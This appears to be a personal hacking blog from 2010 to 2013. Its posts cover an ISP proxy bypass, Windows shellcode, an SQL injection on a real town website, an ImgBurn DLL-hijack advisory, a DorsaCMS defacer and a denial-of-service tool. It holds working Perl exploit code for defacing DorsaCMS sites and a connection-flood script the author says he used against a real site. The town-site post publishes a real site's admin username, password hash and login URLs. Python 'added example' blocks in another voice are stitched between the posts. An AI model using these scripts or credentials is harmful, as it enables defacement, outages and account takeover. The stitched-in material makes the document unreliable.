Wednesday, July 17, 2013

ISP access restriction bypass via web cache proxy

Today I want to explain a vulnerability that I discovered in some ISP web cache proxies in Iran.
I presented this vulnerability at the first Sharif University Cyber Security Awareness Conference
(http://cert.sharif.edu).
By using this vulnerability, when the ISP closes your account, you can browse web pages again!


what is a web cache proxy ?
A web cache is a mechanism for the temporary storage (caching) of web documents, such as HTML pages and images, to reduce bandwidth usage, server load, and perceived lag. A web cache stores copies of documents passing through it; subsequent requests may be satisfied from the cache if certain conditions are met.

dns redirect page
When the ISP's DNS server receives a request for a name that is not recognized or is unavailable, the DNS server returns the IP address of a search page to the client. When the client is using a web browser, this will display a search page that contains possible suggestions on the proper address and a small explanation of the error. These search pages often contain advertising that is paid to the ISP.


but how does this vulnerability work ?!
In this case the ISP restricts our access to all web servers except one. And which one is that?!!
This server is the web cache proxy itself! We still have access to the IP of the web cache proxy, and any HTTP request can be executed over the IP of the web cache proxy: the proxy forwards whatever Host we ask for, regardless of the state of our account!


For example, I want to see a web page (like farsnews.com), so I must make an HTTP request for it over the IP of the web cache (the DNS redirect server), which I still have access to:


and you can see the web page is loaded successfully!

I tested this vulnerability on the largest private ISP in Iran (parsonline.com) and recorded a demo that you can see here:

The vulnerability is now fixed on Pars Online, but other ISPs may be affected!
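The post describes the failure in one sentence: the redirect server is still reachable by a closed account and forwards any Host header. The following Python is an added example, not code from the original post or from any ISP: it models the weak forwarding decision beside a hardened one that ties forwarding to account state, and runs a small check over constructed proxy log lines to flag the bypass signature (a closed account reaching the cache IP with a Host other than the redirect page). REDIRECT_HOST, CACHE_IP, the client addresses and the "client dst method host path status" log layout are all assumptions made for this example.

```python
"""Added example, not code from the original post: a model of the ISP's DNS
redirect / web cache host from a defender's side, plus a log check that spots
the bypass the post describes.

REDIRECT_HOST, CACHE_IP, the client addresses and the log lines are all
constructed for this example; the log format is an assumed
"client dst method host path status" layout, not any particular proxy's format.
"""
import re
from dataclasses import dataclass
from typing import Dict, List, Tuple

REDIRECT_HOST = "search.isp.example"   # assumed name of the DNS redirect (search) page
CACHE_IP = "10.0.0.5"                  # assumed IP of the web cache / redirect server


@dataclass
class Request:
    client_ip: str
    host: str    # value of the HTTP Host header
    path: str


def vulnerable_decide(req: Request, suspended: Dict[str, bool]) -> Tuple[str, str]:
    """Behaviour the post describes: the cache forwards whatever Host the client
    sends, even when the client's account is closed, so the client keeps browsing."""
    return ("forward", req.host)


def hardened_decide(req: Request, suspended: Dict[str, bool]) -> Tuple[str, str]:
    """A closed account only ever gets the redirect page, whatever Host says;
    the forwarding decision is tied to account state, not to reachability of the IP."""
    if suspended.get(req.client_ip, False):
        return ("serve_local", REDIRECT_HOST)
    return ("forward", req.host)


LOG_RE = re.compile(
    r"^(?P<client>\S+) (?P<dst>\S+) (?P<method>\S+) (?P<host>\S+) (?P<path>\S+) (?P<status>\d{3})$"
)


def bypass_attempts(log_lines: List[str], suspended: Dict[str, bool]) -> List[Tuple[str, str]]:
    """Return (client, host) pairs where a closed account reached the cache IP with a
    Host header other than the redirect page: the signature of the bypass above."""
    hits = []
    for line in log_lines:
        m = LOG_RE.match(line.strip())
        if not m:
            continue          # skip lines that do not fit the assumed format
        d = m.groupdict()
        if d["dst"] == CACHE_IP and suspended.get(d["client"], False) and d["host"] != REDIRECT_HOST:
            hits.append((d["client"], d["host"]))
    return hits


# constructed sample data: two closed accounts, one active one
SUSPENDED = {"192.0.2.10": True, "192.0.2.11": True, "192.0.2.20": False}
SAMPLE_LOG = [
    "192.0.2.10 10.0.0.5 GET search.isp.example / 200",   # closed account, the normal redirect page
    "192.0.2.10 10.0.0.5 GET farsnews.com / 200",         # closed account browsing via the cache
    "192.0.2.11 10.0.0.5 GET example.org /news 200",      # same trick from another closed account
    "192.0.2.20 10.0.0.5 GET farsnews.com / 200",         # active account, legitimate use of the cache
    "garbage line",
]

if __name__ == "__main__":
    print(vulnerable_decide(Request("192.0.2.10", "farsnews.com", "/"), SUSPENDED))
    print(hardened_decide(Request("192.0.2.10", "farsnews.com", "/"), SUSPENDED))
    for client, host in bypass_attempts(SAMPLE_LOG, SUSPENDED):
        print(f"bypass attempt: {client} requested {host} through the cache")
```

The detection rule is deliberately narrow: a closed account requesting the redirect page is expected, so only foreign Host values through the cache IP are reported, which keeps the check quiet on the normal "account suspended" traffic.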

Tuesday, May 31, 2011

simple windows shellcoding


shellcode is a small piece of code used as the payload in the exploitation of a software vulnerability. It is called "shellcode" because it typically starts a command shell from which the attacker can control the compromised machine, but any piece of code that performs a similar task can be called shellcode. Because the function of a payload is not limited to merely spawning a shell, some have suggested that the name shellcode is insufficient. However, attempts at replacing the term have not gained wide acceptance. Shellcode is commonly written in machine code.

Shellcode can either be local or remote, depending on whether it gives an attacker control over the machine it runs on (local) or over another machine through a network (remote).

An exploit will commonly inject a shellcode into the target process before or at the same time as it exploits a vulnerability to gain control over the program counter. The program counter is adjusted to point to the shellcode, after which it gets executed and performs its task. Injecting the shellcode is often done by storing the shellcode in data sent over the network to the vulnerable process, by supplying it in a file that is read by the vulnerable process or through the command line or environment in the case of local exploits.

In this post I want to show a simple way of making shellcodes under the Windows operating system.

Debuggers can help us write and test shellcodes quickly. Do you remember the EXE file injection method? In that method we must find a free code area in the EXE file, called a code cave.
In the code cave we can insert assembly instructions and run them! After inserting our code, we must change the instruction pointer to the address where our code begins.

I want to make a MessageBox shellcode that shows d3c0der!

To convert your message (the text you want the shellcode to show) to hex, you can use this site:
http://centricle.com/tools/ascii-hex/

This is an example of converting the word "d3c0der":

Here is a simple piece of assembly code to call the MessageBox function and show a word (OllyDbg syntax; immediates are hexadecimal, so 64 means 0x64 = 'd'):

xor eax,eax                    ; clear the working registers
xor ebx,ebx
xor ecx,ecx
xor edx,edx

mov byte ptr ss:[ebp-7],64     ; 'd'  write "d3c0der" onto the stack below EBP, one byte at a time
mov byte ptr ss:[ebp-6],33     ; '3'
mov byte ptr ss:[ebp-5],63     ; 'c'
mov byte ptr ss:[ebp-4],30     ; '0'
mov byte ptr ss:[ebp-3],64     ; 'd'
mov byte ptr ss:[ebp-2],65     ; 'e'
mov byte ptr ss:[ebp-1],72     ; 'r'  (no terminating NUL is written; the byte already at [ebp] ends the string)

push 0                         ; uType = MB_OK
lea ebx,dword ptr ss:[ebp-7]
push ebx                       ; lpCaption -> "d3c0der"
lea ecx,dword ptr ss:[ebp-7]
push ecx                       ; lpText    -> "d3c0der"
push 0                         ; hWnd = NULL
mov eax,user32.messageboxa     ; absolute address of MessageBoxA in this process (OllyDbg resolves the symbol)
call eax                       ; MessageBoxA(NULL, "d3c0der", "d3c0der", MB_OK)

Now it's time to find a code cave area. You just need to look at the end of the binary's code section:


Now I insert my code into the code cave:


The first instruction that I use is "xor eax,eax",
and its address is 01010D47 (we will use it for changing EIP).

Take a look at the registers window and note the instruction pointer address.


Just follow that address:


and replace the instruction there with "JMP 01010D47"


Now run the program; you can see the d3c0der message.


Let's make it null-free!

Most shellcodes are written without the use of null bytes because they are intended to be injected into a target process through null-terminated strings. When a null-terminated string is copied, it will be copied up to and including the first null but subsequent bytes of the shellcode will not be processed. When shellcode that contains nulls is injected in this way, only part of the shellcode would be injected, making it incapable of running successfully.

To produce null-free shellcode from shellcode that contains null bytes, one can substitute machine instructions that contain zeroes with instructions that have the same effect but are free of nulls. For example, on the IA-32 architecture one could replace this instruction:
push 0

which contains a zero byte as part of the literal (6A 00), with these instructions:
xor ecx,ecx
push ecx

and our final shellcode is:

xor eax,eax
xor ebx,ebx
xor ecx,ecx
xor edx,edx
mov byte ptr ss:[ebp-7],64     ; "d3c0der", byte by byte (C6 45 disp8 imm8: no zero bytes)
mov byte ptr ss:[ebp-6],33
mov byte ptr ss:[ebp-5],63
mov byte ptr ss:[ebp-4],30
mov byte ptr ss:[ebp-3],64
mov byte ptr ss:[ebp-2],65
mov byte ptr ss:[ebp-1],72
xor ecx,ecx                    ; replaces "push 0" (uType = MB_OK)
push ecx
lea ebx,dword ptr ss:[ebp-7]
push ebx                       ; lpCaption
lea ecx,dword ptr ss:[ebp-7]
push ecx                       ; lpText
xor ecx,ecx                    ; replaces "push 0" (hWnd = NULL)
push ecx
mov eax,user32.messageboxa     ; B8 imm32: check this immediate too, it depends on where user32.dll is loaded
call eax
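Two steps above are done by hand in the post: converting the message to hex on a web site, and eyeballing the listing for zero bytes. The Python below is an added example, not code from the original post: it encodes exactly the instruction forms used in the post into bytes with a small hand-written opcode table (xor r32,r32; mov byte [ebp-disp8],imm8; push imm8; push r32; lea r32,[ebp-disp8]; mov eax,imm32; call eax), reports which instructions carry a NUL, and does the ASCII-to-hex step locally. The MessageBoxA address is a constructed placeholder; the real value depends on the user32.dll build that is loaded, which is why that immediate must be checked separately.

```python
"""Added example, not code from the original post: encode the post's x86
instruction sequence to bytes and check it for NUL bytes, so you can see why
`push 0` (6A 00) has to be swapped for `xor ecx,ecx` / `push ecx` (31 C9 / 51).

The encoder is a tiny hand-written table for just these instruction forms
(OllyDbg syntax, immediates in hex). MESSAGEBOXA_ADDR is a constructed
placeholder; the real address depends on the loaded user32.dll.
"""
import re
import struct
from typing import List

MESSAGEBOXA_ADDR = 0x7E4507EA   # placeholder, constructed for the example

REG = {"eax": 0, "ecx": 1, "edx": 2, "ebx": 3}   # register numbers for ModRM / opcode+rd


def encode(instr: str) -> bytes:
    """Encode one instruction in the post's syntax; raises on anything else."""
    instr = " ".join(instr.strip().lower().split())
    m = re.fullmatch(r"xor (e[abcd]x),\1", instr)
    if m:                                              # 31 /r with mod=11
        r = REG[m.group(1)]
        return bytes([0x31, 0xC0 | (r << 3) | r])
    m = re.fullmatch(r"mov byte ptr ss:\[ebp-(\d+)\],([0-9a-f]{1,2})", instr)
    if m:                                              # C6 45 disp8 imm8
        disp = (-int(m.group(1))) & 0xFF
        return bytes([0xC6, 0x45, disp, int(m.group(2), 16)])
    m = re.fullmatch(r"push (\d+)", instr)
    if m:                                              # 6A ib (push imm8)
        return bytes([0x6A, int(m.group(1), 16) & 0xFF])
    m = re.fullmatch(r"push (e[abcd]x)", instr)
    if m:                                              # 50+rd
        return bytes([0x50 | REG[m.group(1)]])
    m = re.fullmatch(r"lea (e[abcd]x),dword ptr ss:\[ebp-(\d+)\]", instr)
    if m:                                              # 8D /r, [ebp+disp8]
        disp = (-int(m.group(2))) & 0xFF
        return bytes([0x8D, 0x45 | (REG[m.group(1)] << 3), disp])
    if instr == "mov eax,user32.messageboxa":          # B8 imm32
        return b"\xB8" + struct.pack("<I", MESSAGEBOXA_ADDR)
    if instr == "call eax":                            # FF D0
        return b"\xFF\xD0"
    raise ValueError(f"unsupported instruction: {instr!r}")


def assemble(lines: List[str]) -> bytes:
    return b"".join(encode(l) for l in lines if l.strip())


def null_offsets(code: bytes) -> List[int]:
    """Offsets of every 0x00 byte; must be empty for a string-copy delivery."""
    return [i for i, b in enumerate(code) if b == 0]


def offending_instructions(lines: List[str]) -> List[str]:
    """Instructions whose own encoding contains a NUL byte."""
    return [l.strip() for l in lines if l.strip() and 0 in encode(l)]


def ascii_to_hex_bytes(text: str) -> List[str]:
    """The conversion the post does on a web site, done locally."""
    return [f"{b:02x}" for b in text.encode("ascii")]


STORE = [f"mov byte ptr ss:[ebp-{7 - i}],{h}" for i, h in enumerate(ascii_to_hex_bytes("d3c0der"))]
CLEAR = ["xor eax,eax", "xor ebx,ebx", "xor ecx,ecx", "xor edx,edx"]
CALL_TAIL = ["lea ebx,dword ptr ss:[ebp-7]", "push ebx", "lea ecx,dword ptr ss:[ebp-7]", "push ecx"]

# the post's first listing and its null-free final listing
FIRST = CLEAR + STORE + ["push 0"] + CALL_TAIL + ["push 0", "mov eax,user32.messageboxa", "call eax"]
FINAL = (CLEAR + STORE + ["xor ecx,ecx", "push ecx"] + CALL_TAIL
         + ["xor ecx,ecx", "push ecx", "mov eax,user32.messageboxa", "call eax"])

if __name__ == "__main__":
    print("offending:", offending_instructions(FIRST))
    print("nulls in first listing at:", null_offsets(assemble(FIRST)))
    print("nulls in final listing at:", null_offsets(assemble(FINAL)))
    print(assemble(FINAL).hex())
```

Because the listing is generated from `ascii_to_hex_bytes("d3c0der")`, the same script checks any other message: a message containing a byte that encodes to 00 would show up in `offending_instructions` immediately, before anything is pasted into a debugger.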


good luck!

Sunday, February 6, 2011

how was the hillsboro beach website hacked ?

A few weeks ago I read a news item on Fox News about an American website:

http://www.foxnews.com/scitech/2011/01/18/florida-communitys-website-targeted-iranian-hackers/

I logged in to the website and found the bug; in this post I want to show the vulnerability of this site :D

Let's go!
First, the home page:

SQL error:

The number of selected columns is incorrect:

MySQL version:


Username and password :D :


user : tohbadministrator
pass : 481a91595db92d57

and the login pages:
http://townofhillsborobeach.com/cmsadmin/index.php
http://townofhillsborobeach.com/ControlPanel/index.xsl

I have a message for Fox News: they are not Iranian pro hackers! They are some Basiji script kiddies . . .
good luck :p

Tuesday, January 4, 2011

ImgBurn 2.4.0.0 dll hijack vulnerability

I have found a vulnerability in ImgBurn that could allow a remote attacker to execute arbitrary code on the system. The application does not directly specify the fully qualified path to a dynamic-linked library (dwmapi.dll) when running on Microsoft Windows. By persuading a victim to open a specially-crafted file from a WebDAV or SMB share using a vulnerable application, a remote attacker could exploit this vulnerability via a specially-crafted library to execute arbitrary code on the system.
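The advisory's root cause is the bare library name: the loader walks the DLL search order and, on a system that has no dwmapi.dll of its own, reaches the directory of the opened document. The Python below is an added example, not code from the advisory or from ImgBurn: it models the documented default search order (SafeDllSearchMode enabled; the 16-bit system directory step is left out) and shows the bare-name load picking up a planted copy from a share, beside two mitigations, a fully qualified path and removing the current directory from the search as SetDllDirectory("") does. All directory names and the set of files present are constructed.

```python
"""Added example, not code from the advisory or from ImgBurn: a model of the
Windows DLL search order that shows how a bare LoadLibrary("dwmapi.dll") can
resolve to a planted copy in the directory of the opened document (the WebDAV
or SMB share), and how a fully qualified path avoids it.

Directory names and the set of files present are constructed. The search
order modelled is the documented default (SafeDllSearchMode enabled); the
16-bit system directory step is left out for brevity.
"""
from typing import List, Optional, Set

DLL = "dwmapi.dll"
APP_DIR = r"C:\Program Files\ImgBurn"
SYSTEM_DIR = r"C:\WINDOWS\system32"
WINDOWS_DIR = r"C:\WINDOWS"
PATH_DIRS = [r"C:\WINDOWS\system32", r"C:\WINDOWS"]
SHARE_DIR = r"\\share.example\pub"      # constructed: directory of the opened image file


def search_order(cwd: str, safe_search: bool = True, cwd_in_search: bool = True) -> List[str]:
    """Directories consulted, in order, when a DLL is loaded by bare name.
    cwd_in_search=False models the effect of SetDllDirectory("")."""
    if safe_search:
        order = [APP_DIR, SYSTEM_DIR, WINDOWS_DIR, cwd] + PATH_DIRS
    else:
        # SafeDllSearchMode disabled: the current directory comes right after the app directory
        order = [APP_DIR, cwd, SYSTEM_DIR, WINDOWS_DIR] + PATH_DIRS
    if not cwd_in_search:
        order = [d for d in order if d != cwd]
    return order


def resolve_bare_name(name: str, dirs: List[str], present: Set[str]) -> Optional[str]:
    """The first directory in the search order that actually holds the file wins."""
    for d in dirs:
        candidate = d.rstrip("\\") + "\\" + name
        if candidate.lower() in present:
            return candidate
    return None


def resolve_qualified(path: str, present: Set[str]) -> Optional[str]:
    """A fully qualified path is looked up in exactly one place."""
    return path if path.lower() in present else None


# constructed: a Windows XP machine (no dwmapi.dll anywhere on the system; it
# ships with Vista and later) where the opened file sits on a share that also
# holds an attacker-controlled dwmapi.dll
PRESENT_XP = {
    r"c:\program files\imgburn\imgburn.exe",
    r"c:\windows\system32\user32.dll",
    r"\\share.example\pub\image.cue",
    r"\\share.example\pub\dwmapi.dll",
}
# constructed: the same share, but a system that has its own dwmapi.dll
PRESENT_VISTA = PRESENT_XP | {r"c:\windows\system32\dwmapi.dll"}


def vulnerable_load(present: Set[str] = PRESENT_XP) -> Optional[str]:
    # bare name: the search walks through to the current directory, i.e. the share
    return resolve_bare_name(DLL, search_order(cwd=SHARE_DIR), present)


def hardened_load(present: Set[str] = PRESENT_XP) -> Optional[str]:
    # fully qualified path: either the system copy is used or the load fails,
    # but nothing is ever taken from the document's directory
    return resolve_qualified(SYSTEM_DIR + "\\" + DLL, present)


def hardened_load_no_cwd(present: Set[str] = PRESENT_XP) -> Optional[str]:
    # alternative: SetDllDirectory("") drops the current directory from the search
    return resolve_bare_name(DLL, search_order(cwd=SHARE_DIR, cwd_in_search=False), present)


if __name__ == "__main__":
    print("bare name, XP   :", vulnerable_load())
    print("bare name, Vista:", vulnerable_load(PRESENT_VISTA))
    print("qualified, XP   :", hardened_load())
    print("no cwd, XP      :", hardened_load_no_cwd())
```

The Vista case in the test shows why the issue was reported against XP: once a system copy exists, the default search order reaches system32 before the current directory, so the planted file only wins on systems where the library is absent.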

IN THE NEWS :

http://www.governmentsecurity.org/latest-security-news/critical-vulnerability-in-imgburn.html
http://www.livehacking.com/2011/01/05/unpatched-hole-in-imgburn-disk-burning-application/
http://www.h-online.com/security/news/item/Unpatched-hole-in-ImgBurn-disk-burning-application-1163003.html
http://forums.cnet.com/7723-6132_102-512542.html
http://www.net-security.org/secworld.php?id=10397
http://www.esecurityplanet.com/headlines/article.php/3919281/Security-Vulnerability-Found-in-ImgBurn.htm
http://www.naked-security.com/nsa/185411.htm
http://www.zerodaylab.com/vulnerabilities/CVE-2011/CVE-2011-0403.html

    Thursday, December 16, 2010

    DorsaCms SQL Injection Vulnerability

    Dorsa is a CMS that has a security certificate.

    You can see the security certificate at this link:
    http://dorsagroup.ir/ShowPage.aspx?page_=form&order=show&lang=1&sub=0&PageId=69&tempname=Other

    But I found a blind SQL injection vulnerability in this CMS:

    http://packetstormsecurity.org/files/view/96736/dorsacmsdefacer-sql.txt

    Exploit code (tested on Windows XP):


    #!/usr/bin/perl
    #d3c0der
    system('color a');
    system('cls');
    system('title DorsaCMS Defacer');
    print q{
    ===================================================
    -= ** =-
    DorsaCMS Defacer

    [+] Coded by d3c0der   =>  d3c0der@hotmail.com

    [+] AttackerZ Under Ground Group  =>  wwW.Attackerz.iR
    -= ** =-
    ===================================================


    };

    use HTTP::Request;
    use LWP::UserAgent;



    print "~# Target : ";
    $site=<STDIN>;
    chomp $site;
    print "~# PageID : ";
    $id=<STDIN>;
    chomp $id;
     print "~# Deface Text : ";
    $def=<STDIN>;
    chomp $def;

    if ( $site !~ /^http:/ ) {
    $site = 'http://' . $site;
    }
    if ( $site !~ /\/$/ ) {
    $site = $site . '/';
    }
    print "\n";

    print "->hacking : $site\n";




    @path1=("ShowPage.aspx?page_=news&lang=1&sub=0&PageID=$id update news set Comment='$def';--");

    foreach $ways(@path1){

    $final=$site.$ways;

    my $req=HTTP::Request->new(GET=>$final);
    my $ua=LWP::UserAgent->new();
    $ua->timeout(30);
    my $response=$ua->request($req);


    }

    print "[-] now this url is hacked $siteShowPage.aspx?page_=news&lang=1&sub=0&PageID=$id\n";




    ##
    # By d3c0der
    ##
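The exploit above works because the PageID value is spliced into the statement text, so the text after the number (an UPDATE on the news table) runs as a second statement. The Python below is an added example, not code from the original post or from DorsaCMS: a stand-in for the page handler, over an in-memory SQLite database with a constructed news table, showing the concatenation beside a hardened handler that requires an integer PageID and binds it as a parameter. SQLite needs an explicit ';' between stacked statements (hence executescript and the ';' in the constructed payload); T-SQL batches accept whitespace alone, which is why the post's payload has none.

```python
"""Added example, not code from the original post or from DorsaCMS: a stand-in
for the page handler behind ShowPage.aspx, over an in-memory SQLite database,
showing the PageID concatenation that makes a stacked UPDATE possible next to
a hardened handler.

Table layout, rows and payload are constructed. SQLite needs an explicit ';'
between stacked statements, so executescript and a ';' in the payload stand in
for a server that runs whitespace-separated batches.
"""
import sqlite3
from typing import Optional, Tuple


def make_db() -> sqlite3.Connection:
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE news (PageID INTEGER, Title TEXT, Comment TEXT)")
    db.executemany("INSERT INTO news VALUES (?, ?, ?)",
                   [(1, "first", "original comment"), (5, "fifth", "original comment")])
    db.commit()
    return db


def show_page_vulnerable(db: sqlite3.Connection, page_id: str) -> None:
    """PageID is pasted straight into the statement text, so whatever follows the
    number is executed too (executescript stands in for a server that runs batches)."""
    db.executescript(f"SELECT Title, Comment FROM news WHERE PageID={page_id}")


def show_page_hardened(db: sqlite3.Connection, page_id: str) -> Optional[Tuple[str, str]]:
    """PageID must parse as an integer and is bound as a parameter, never spliced in."""
    pid = int(page_id)      # raises ValueError for anything but a plain number
    return db.execute("SELECT Title, Comment FROM news WHERE PageID=?", (pid,)).fetchone()


def comment_of(db: sqlite3.Connection, pid: int) -> str:
    return db.execute("SELECT Comment FROM news WHERE PageID=?", (pid,)).fetchone()[0]


# constructed payload in the shape of the post's exploit (ShowPage.aspx?...&PageID=<this>)
PAYLOAD = "5; update news set Comment='defaced';--"


def demo_vulnerable() -> Tuple[str, str]:
    """Comments of page 1 and page 5 after the payload hits the vulnerable handler."""
    db = make_db()
    show_page_vulnerable(db, PAYLOAD)
    return comment_of(db, 1), comment_of(db, 5)


def demo_hardened() -> Tuple[str, str]:
    """Same payload against the hardened handler: rejected, rows untouched."""
    db = make_db()
    try:
        show_page_hardened(db, PAYLOAD)
    except ValueError:
        pass                # the request would be answered with an error page
    return comment_of(db, 1), comment_of(db, 5)


if __name__ == "__main__":
    print("vulnerable:", demo_vulnerable())
    print("hardened  :", demo_hardened())
    print("normal    :", show_page_hardened(make_db(), "5"))
```

Note that the UPDATE has no WHERE clause, so in the vulnerable run every row's comment changes, which matches the post's description of a site-wide deface from one request.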



    Thursday, December 2, 2010

    simple d.o.s attacker

    Hi,
    I wrote a simple Perl denial of service script.

    I've got it working on Windows XP with ActivePerl.
    I used this script to attack the MySQL port of a security website, and here is the result ;)



    please use this code FOR EDUCATIONAL PURPOSES  ONLY

    #!/usr/bin/perl
    #d3c0der
    system('color a');
    system('cls');
    print q{
    ===================================================
    -= ** =-
    AttackerZ d.o.s Attacker - version 1.0

    [+] coded by d3c0der   =>  d3c0der@hotmail.com

    [+] AttackerZ Under Ground TM  =>  wwW.Attackerz.iR
    -= ** =-

    ===>  FOR EDUCATIONAL PURPOSES  ONLY <===

    ===================================================


    };

    use IO::Socket;

    print "Host: ";{
    chop ($host = <stdin>);
    print "Port: ";
    chop ($port = <stdin>);
    print "SYN Requests to send : ";
    chop ($num= <stdin>);
    }
    if(defined($ARGV[2])){
    $host = $ARGV[0];
    $port = $ARGV[1];
    $num = $ARGV[2];
    }
    for ($i=0; $i<$num; $i++)
    {
    $len = length $form;
    $sock = IO::Socket::INET->new (
    PeerAddr => $host,
    PeerPort => $port,
    Proto => 'tcp') || die "$! sorry ! Can't Connect";
    syswrite STDOUT, "[+]SYN Request: $i\n";
    }
    $local_time = localtime();

    $login = getlogin();
    print " hello $login , your attack finish at $local_time\n";

    print "All packets sent to $host\n";

     print "Press any key To exit...";
    $end = <STDIN>;
    chop ($end);

    Wednesday, November 24, 2010

    !exploitable Crash Analyzer

    !exploitable (pronounced "bang exploitable") Crash Analyzer is a plugin for the Windows Debugger that parses your crash logs and gives you two important pieces of information. First, it will collate all of your crashes and determine exactly how many there actually are. So for example, out of 60 crash reports, there may only be 2 or 3 actual problems.


    0:006> g
    (19ec.1a0): Access violation - code c0000005 (first chance)
    First chance exceptions are reported before any exception handling.
    This exception may be expected and handled.
    eax=00000001 ebx=00000113 ecx=00000001 edx=00000000 esi=7c57edd2 edi=007f46bc
    eip=41414141 esp=0098fd88 ebp=0098fde0 iopl=0         nv up ei pl nz ac po nc
    cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010212
    41414141 ??              ???
    0:001> !load msec.dll
    0:001> !exploitable
    Exploitability Classification: EXPLOITABLE
    Recommended Bug Title: Exploitable - Read Access Violation at the Instruction Pointer starting at 
    Unknown Symbol @ 0x0000000041414141 called from KERNEL32!BaseThreadStart+0x0000000000000052 (Hash=0x264d5172.0x5a5e1f77)
    
    Access violations at the instruction pointer are exploitable if not near NULL.


    The second thing it does is look at the type of crash and try to determine if the error is something that could be exploited by a malicious hacker. This means that more junior employees can work these bug issues without taking the time of more senior examiners. Jason Shirk from the Security Core team joined us to take a look at !exploitable. To download the app, go to: http://www.codeplex.com/msecdbg.
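The collation step described above (many crash reports, few distinct bugs) comes down to reading the classification and the hash out of each !exploitable report and grouping on the hash. The Python below is an added example, not code from the original post or from the !exploitable tool: it parses a WinDbg transcript containing several reports, rejoins the wrapped "Recommended Bug Title" line, and buckets the crashes by hash. The transcript is constructed; the first report reuses the lines shown in the post, and the other two reports (one a duplicate of the first, one with a made-up hash and a PROBABLY_NOT_EXPLOITABLE verdict) are invented for the example.

```python
"""Added example, not code from the original post or from the !exploitable
tool: parse !exploitable output from a WinDbg transcript and bucket crashes
by hash, the "60 crash reports, 2 or 3 actual problems" step the post describes.

The transcript is constructed: report 1 is the post's own output, reports 2
and 3 are made up (2 duplicates 1, 3 carries an invented hash).
"""
import re
from collections import OrderedDict
from typing import Dict, List

PROMPT_RE = re.compile(r"^\S+> !exploitable\s*$", re.M)
CLASS_RE = re.compile(r"^Exploitability Classification: (\S+)", re.M)
# the title may wrap onto a second line, so match across newlines up to "(Hash=...)"
TITLE_RE = re.compile(r"^Recommended Bug Title: (.+?)\s*\(Hash=(0x[0-9a-f]+\.0x[0-9a-f]+)\)", re.M | re.S)


def parse_reports(transcript: str) -> List[Dict[str, str]]:
    """One record per !exploitable invocation: classification, one-line title, hash."""
    reports = []
    for chunk in PROMPT_RE.split(transcript)[1:]:       # text before the first prompt is not a report
        c = CLASS_RE.search(chunk)
        t = TITLE_RE.search(chunk)
        if not (c and t):
            continue                                     # incomplete report, skip it
        reports.append({
            "classification": c.group(1),
            "title": " ".join(t.group(1).split()),      # rejoin the wrapped title
            "hash": t.group(2),
        })
    return reports


def bucket_by_hash(reports: List[Dict[str, str]]) -> "OrderedDict[str, List[Dict[str, str]]]":
    """Crashes sharing a hash are the same underlying bug."""
    buckets: "OrderedDict[str, List[Dict[str, str]]]" = OrderedDict()
    for r in reports:
        buckets.setdefault(r["hash"], []).append(r)
    return buckets


def triage_summary(transcript: str) -> Dict[str, object]:
    reports = parse_reports(transcript)
    buckets = bucket_by_hash(reports)
    exploitable = sorted(h for h, rs in buckets.items()
                         if any(r["classification"] == "EXPLOITABLE" for r in rs))
    return {"crashes": len(reports), "unique": len(buckets), "exploitable": exploitable}


TRANSCRIPT = """\
0:001> !load msec.dll
0:001> !exploitable
Exploitability Classification: EXPLOITABLE
Recommended Bug Title: Exploitable - Read Access Violation at the Instruction Pointer starting at 
Unknown Symbol @ 0x0000000041414141 called from KERNEL32!BaseThreadStart+0x0000000000000052 (Hash=0x264d5172.0x5a5e1f77)

Access violations at the instruction pointer are exploitable if not near NULL.
0:001> !exploitable
Exploitability Classification: EXPLOITABLE
Recommended Bug Title: Exploitable - Read Access Violation at the Instruction Pointer starting at 
Unknown Symbol @ 0x0000000041414141 called from KERNEL32!BaseThreadStart+0x0000000000000052 (Hash=0x264d5172.0x5a5e1f77)
0:001> !exploitable
Exploitability Classification: PROBABLY_NOT_EXPLOITABLE
Recommended Bug Title: Probably Not Exploitable - Read Access Violation near NULL starting at demo!parse+0x0000000000000010 (Hash=0x11111111.0x22222222)
"""

if __name__ == "__main__":
    for r in parse_reports(TRANSCRIPT):
        print(r["hash"], r["classification"], r["title"][:60])
    print(triage_summary(TRANSCRIPT))
```

Grouping on the hash rather than on the title is deliberate: the title wraps and carries symbol names that vary between builds, while the hash pair is what !exploitable computes from the stack for exactly this purpose.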

    download video :